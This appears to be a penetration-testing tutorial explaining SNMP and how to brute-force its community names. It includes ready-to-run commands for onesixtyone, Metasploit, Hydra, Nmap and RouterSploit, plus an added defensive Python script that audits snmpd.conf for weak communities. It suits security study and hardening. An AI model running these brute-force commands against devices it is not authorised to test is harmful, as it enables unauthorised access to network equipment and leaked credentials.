Brute-Forcing the Simple Network Management Protocol (SNMP)
Introduction to SNMP
The Simple Network Management Protocol (SNMP) is a set of network management standards comprising an application-layer protocol, a database schema, and a set of data objects. Network management systems use it to monitor devices connected to the network for conditions that need administrative attention. The protocol is part of the Internet protocol suite defined by the Internet Engineering Task Force (IETF).
SNMP basic components
An SNMP-managed network consists of the following three key components:
- Network management systems (NMSs)
- Managed devices
- Agents
A network management system runs an application that monitors and controls the managed devices. Also known as the management entity, it is where the network administrator interacts with network devices. The network management system provides much of the computing and memory resources required for network management. A managed network may have more than one network management system.
A managed device is a network node that resides in a managed network and contains an SNMP agent. The managed device collects and stores management information in the Management Information Base (MIB) and allows the network management system to obtain this information through the SNMP agent.
An agent is a network management software module that resides in a managed device. The agent controls the management information of the local machine and sends this information in an SNMP-compatible format.
Brute-forcing SNMP
Many people may ask: what information can I get through SNMP? What does brute-forcing SNMP do? And finally, how is it done?
What information does SNMP expose?
- Monitoring device uptime (sysUpTimeInstance)
- Operating system version list (sysDescr)
- Collects interface information (ifName, ifDescr, ifSpeed, ifType, ifPhysAddr)
- Measures Network Interface Throughput (ifInOctets, ifOutOctets)
- Querying Remote ARP Cache (ipNetToMedia)
This information is very valuable during the information-gathering stage of a penetration test.
In addition, some devices store their logs in MIB tables, and those logs often contain useful information. For example, a password entered by the administrator at login may end up in the log, in which case the log reveals the administrator's account name and password, or similar details.
What does brute-forcing SNMP do?
In SNMP v1 and v2, SNMP agents and SNMP managers rely on community names for authentication, and the default community name is “public”. The community name is often called the SNMP password, but it is not actually a password.
SNMP v3 strengthens security by adding real authentication: it supports authentication based on a user name and password.
Therefore, with v1 and v2 the target of brute-forcing is the community name, and with v3 it is the user name and password. Of course, many of the devices I have encountered still use the former, so what follows is still brute-forcing the community name.
How is it done?
With tools, of course. The following five tools can be used to brute-force SNMP community names.
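The defender's side of the point above, as an added example that is not part of the original article: a Python check of a net-snmp snmpd.conf for v1/v2c community names that a dictionary would find quickly, community access open to any source, and write access. The wordlist, the length threshold and the sample configuration are constructed assumptions.

```python
# Added example: audit of net-snmp snmpd.conf community settings.
WEAK = {"public", "private", "community", "snmp", "admin", "manager"}  # assumed wordlist
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}
MIN_LEN = 8  # assumed minimum length for a community name

def audit_snmpd_conf(text):
    """Return (line_no, issue) pairs for v1/v2c community directives."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        tok = raw.split("#", 1)[0].split()  # drop comments, then tokenize
        if not tok:
            continue
        directive, args = tok[0].lower(), tok[1:]
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            if not args:
                continue
            community = args[0]
            source = args[1] if len(args) > 1 else "default"  # no SOURCE means any host
            writable = directive.startswith("rw")
        elif directive == "com2sec":
            if args[:1] == ["-Cn"]:  # optional form: com2sec -Cn CONTEXT SECNAME SOURCE COMMUNITY
                args = args[2:]
            if len(args) < 3:
                continue
            _secname, source, community = args[:3]
            writable = False  # write access is granted elsewhere (access lines)
        else:
            continue  # rouser/createUser (v3) and unrelated directives
        if community.lower() in WEAK or len(community) < MIN_LEN:
            findings.append((no, "weak-community"))
        if source.lower() in ANY_SOURCE:
            findings.append((no, "any-source"))
        if writable:
            findings.append((no, "write-access"))
    return findings

# Constructed sample configuration, not taken from a real device.
SAMPLE = """\
# constructed sample
rocommunity public
rwcommunity N3t0ps-rw-4f9a1c 10.0.5.0/24
com2sec -Cn ctx1 monitor default snmp
rocommunity Zq7-kd82-Lm4x-readonly 10.0.5.10
rouser nmsuser priv
"""

if __name__ == "__main__":
    for no, issue in audit_snmpd_conf(SAMPLE):
        print(f"line {no}: {issue}")
```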
Onesixtyone
Onesixtyone is an SNMP scanning tool designed to find the SNMP community name on a device.
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <Target> -w 100
Metasploit
The famous Metasploit can of course also be used to brute-force SNMP community names. There is not much to explain, so look directly at the commands:
msf> use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS <Target>
msf auxiliary(snmp_login) > set STOP_ON_SUCCESS true
msf auxiliary(snmp_login) > run
Hydra
No discussion of brute-forcing would be complete without Hydra.
hydra -P pass.txt <Target> snmp
Nmap
Nmap is more than just a port scanning tool.
nmap -sU -v --script snmp-brute --script-args passdb=passwords.lst <Target>
nmap -sU -v --script snmp-brute --script-args userdb=usernames.lst,passdb=passwords.lst <Target>
RouterSploit
The RouterSploit framework is an open-source vulnerability detection and exploitation framework aimed mainly at routers and other embedded devices. It also includes modules that can be used to brute-force SNMP community names.
rsf > use creds/snmp_bruteforce
rsf (SNMP Bruteforce) > set target <Target>
[+] {'target': '172.16.18.156'}
rsf (SNMP Bruteforce) > run